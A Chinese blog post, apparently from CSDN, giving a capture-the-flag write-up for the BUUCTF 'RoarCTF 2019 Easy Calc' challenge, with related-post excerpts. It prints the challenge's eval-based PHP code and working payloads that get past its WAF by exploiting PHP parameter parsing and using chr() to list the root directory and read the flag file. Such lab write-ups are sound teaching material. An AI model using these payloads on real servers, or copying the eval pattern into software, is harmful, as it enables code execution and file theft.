buuctf [RoarCTF 2019]Easy Calc

最新推荐文章于 2025-04-17 20:38:25 发布
最新推荐文章于 2025-04-17 20:38:25 发布
阅读量419 收藏
点赞数 1
文章标签: html css bootstrap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_65766842/article/details/130039349
版权

首先我们打开题目

<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>简单的计算器</title>
  
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="./libs/bootstrap.min.css">
  <script src="./libs/jquery-3.3.1.min.js"></script>
  <script src="./libs/bootstrap.min.js"></script>
</head>
<body>

<div class="container text-center" style="margin-top:30px;">
  <h2>表达式</h2>
  <form id="calc">
    <div class="form-group">
      <input type="text" class="form-control" id="content" placeholder="输入计算式" data-com.agilebits.onepassword.user-edited="yes">
    </div>
    <div id="result"><div class="alert alert-success">
            </div></div>
    <button type="submit" class="btn btn-primary">计算</button>
  </form>
</div>
<!--I've set up WAF to ensure security.-->
<script>
    $('#calc').submit(function(){
        $.ajax({
            url:"calc.php?num="+encodeURIComponent($("#content").val()),
            type:'GET',
            success:function(data){
                $("#result").html(`<div class="alert alert-success">
            <strong>答案:</strong>${data}
            </div>`);
            },
            error:function(){
                alert("这啥?算不来!");
            }
        })
        return false;
    })
</script>

</body></html>

我们使用new bing来解释下代码

 

 经过代码审计之后我们知道应该访问访问calc.php文件

我们打开calc.php文件

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

  • 可以看出原页面通过js将表达式传给calc.php,同时calc.php对传入的参数进行了一些限制后使用eval函数输出结果

  • 参考资料:

    https://blog.youkuaiyun.com/weixin_46203060/article/details/108168506?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168100955916800213061404%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=168100955916800213061404&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-108168506-null-null.142^v82^insert_down1,201^v4^add_ask,239^v2^insert_chatgpt&utm_term=ctfeval%E5%87%BD%E6%95%B0&spm=1018.2226.3001.4187

我们尝试了提交非数字的字符报错,我们审计代码后,发现可能是num变量被waf过滤了

参考资料:

https://blog.youkuaiyun.com/weixin_40228200/article/details/126280639?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168100991316800226559633%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=168100991316800226559633&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_click~default-2-126280639-null-null.142^v82^insert_down1,201^v4^add_ask,239^v2^insert_chatgpt&utm_term=waf&spm=1018.2226.3001.4187

通过查阅资料我们可知这里需要利用php的字符串解析特性

参考资料:

https://blog.youkuaiyun.com/qq_45521281/article/details/105871192?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168101012716782427490458%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=168101012716782427490458&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-105871192-null-null.142^v82^insert_down1,201^v4^add_ask,239^v2^insert_chatgpt&utm_term=PHP%E7%9A%84%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%A7%A3%E6%9E%90%E7%89%B9%E6%80%A7&spm=1018.2226.3001.4187

PHP会将查询字符串(在URL或正文中)转换为内部$_GET等关联数组

/?foo=bar会变成Array([foo] => "bar")

在这个过程中某些字符会被删除或用下划线代替

/?%20news[id%00=42会变成Array([news_id] => 42)

尝试扫描下这个文件下的包含文件

? num=1;var_dump(scandir(chr(47)))

得到以下结果

1array(24) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(4) "boot" [5]=> string(3) "dev" [6]=> string(3) "etc" [7]=> string(5) "f1agg" [8]=> string(4) "home" [9]=> string(3) "lib" [10]=> string(5) "lib64" [11]=> string(5) "media" [12]=> string(3) "mnt" [13]=> string(3) "opt" [14]=> string(4) "proc" [15]=> string(4) "root" [16]=> string(3) "run" [17]=> string(4) "sbin" [18]=> string(3) "srv" [19]=> string(8) "start.sh" [20]=> string(3) "sys" [21]=> string(3) "tmp" [22]=> string(3) "usr" [23]=> string(3) "var" }

有一个名叫f1agg的文件,感觉像是flag文件,我们尝试打开
 

? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

得到flag

1string(43) "flag{78db4d11-a484-4a97-b58b-a0b1d010f7b9} "

m0_65766842
关注
[RoarCTF 2019]Easy Calc
I_WORM的博客
02-29 782
构造payload:print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))构造payload:print_r(scandir(chr(47))) 读取根目录下的文件信息;file_get_contents() 将文件内容读取到字符串中;发现成功执行了phpinfo()函数;通过抓包测试发现了calc.php的一段源码信息;查看源码发现设置了waf;所以用chr()进行输入绕过;
BUUCTF [RoarCTF 2019]Easy Calc1
qq_35874748的博客
10-19 3158
一.打开题目后: 二.Ctrl+U查看源代码: 发现存在WAF和一个文件calc.php,这里我们就需要简单的了解下什么是WAF了: WAF的全称是(Web Application Firewall)即Web应用防火墙,简称WAF。 那么WAF能做什么? WAF可以过滤HTTP/HTTPS协议流量,防护Web攻击。 WAF可以对Web应用进行安全审计 WAF可以防止CC攻击 应用交付 CC攻击:通过大量请求对应用程序资源消耗最大的应用,如...
【[RoarCTF 2019]Easy Calc
qq_40646572的博客
05-05 217
信息搜集 打开目标页面,搜集下可用的信息。 在文本框随便输入了点字母,发现提示。 打开页面源码,发现了提示,有waf存在。并且发现数据发送到calc.php页面,参数是num。 打开calc.php页面发现源码。 http://node4.buuoj.cn:28614/calc.php? num=phpinfo() Num参数前加一个空格。 为什么要num参数前加一个空格,是因为加一个空格为了绕过waf,在请求传递到waf层的时候,waf会检测num变量,当num前面加一个空格时,目标变量会找.
buuctf】[RoarCTF]Easy Calc
最新发布
善恶终有报,天道好轮回;不信抬头看,苍天饶过谁
04-17 670
正是修行时
RoarCTF 2019 Easy Calc
BlueDoorZz的博客
07-11 414
0x00 题目类型:php,RCE。 知识点:php对变量空格的解析。 0x01 查看源码,提醒有WAF保护,不过我们不知道规则。发现calc.php,对传入的num参数做了如下限制。 $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blacklist as $blackitem) {
2025.2.7——一、[RoarCTF 2019]Easy Calc 代码审计|WAF|PHP字符串解析特性
2402_87387800的博客
02-08 875
题目来源:BUUCTF [RoarCTF 2019]Easy Calc
BUUCTF_[RoarCTF 2019]Easy Calc(RCE/waf绕过/PHP字符串解析特性/代码审计)
2401_87524087的博客
02-08 816
打开靶场查看源代码这段代码是用 jQuery 编写的,其主要功能是当 ID 为calc的表单被提交时,阻止表单的默认提交行为,然后通过 AJAX(异步的 JavaScript 和 XML)向calc.php发送一个 GET 请求。请求的参数num是 ID 为content的输入框中的值,并且对该值进行了 URI 编码处理。如果请求成功,会将返回的数据显示在 ID 为result的元素中,以一个带有成功提示样式的 HTML 结构呈现;如果请求失败,会弹出一个警告框提示 “这啥?算不来!
BUUCTF[RoarCTF 2019]Easy Calc
楼阁de猫的博客
12-23 229
[RoarCTF 2019]Easy Calc 查看源码 $("#content").val(): 获取id为content的HTML标签元素的值,是JQuery, 发现有calc.php,看看有什么 这里显示了waf的过滤规则 我们上传字符发现都被过滤了,这里考察的是PHP的字符串解析特性 PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1.删除空白符 2.将某些字符转换为下划线(包括空格) 利用这个特性,我们就可以在num前面加一个空格,然后就能绕过waf,执行
[RoarCTF 2019]Easy Calc 1
01-02
### RoarCTF 2019 Easy Calc 1 Writeup 在处理此挑战时,注意到当输入字母或某些特殊字符时程序会抛出错误,这表明可能存在Web应用防火墙(WAF)[^1]。 为了进一步探索漏洞并尝试绕过WAF,可以利用PHP特有的字符串解析行为。具体来说,在变量名前添加空格(例如`%20num`),可以让WAF误判而不阻止请求,但服务器端解释执行时仍能正常识别参数[^4]。 对于文件操作函数的应用,如读取目录内容和获取特定文件的内容,可以通过组合使用内置函数实现目标: - 使用 `scandir()` 列举指定路径下的所有条目; - 应用 `file_get_contents()` 来加载所需文件的数据流; 考虑到过滤机制的存在,直接传递斜杠 `/` 不可行的情况下,采用 PHP 的 `chr()` 函数动态构建 ASCII 字符串作为替代方案是一个有效的策略[^5]。 最终解决方案涉及构造如下形式的 URL 请求来完成 flag 文件的读取: ```plaintext ? num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))); ``` 上述方法成功规避了 WAF 对非法字符的拦截,并实现了预期功能——即显示位于根目录下名为 "flagg" 的文本文件中的秘密信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值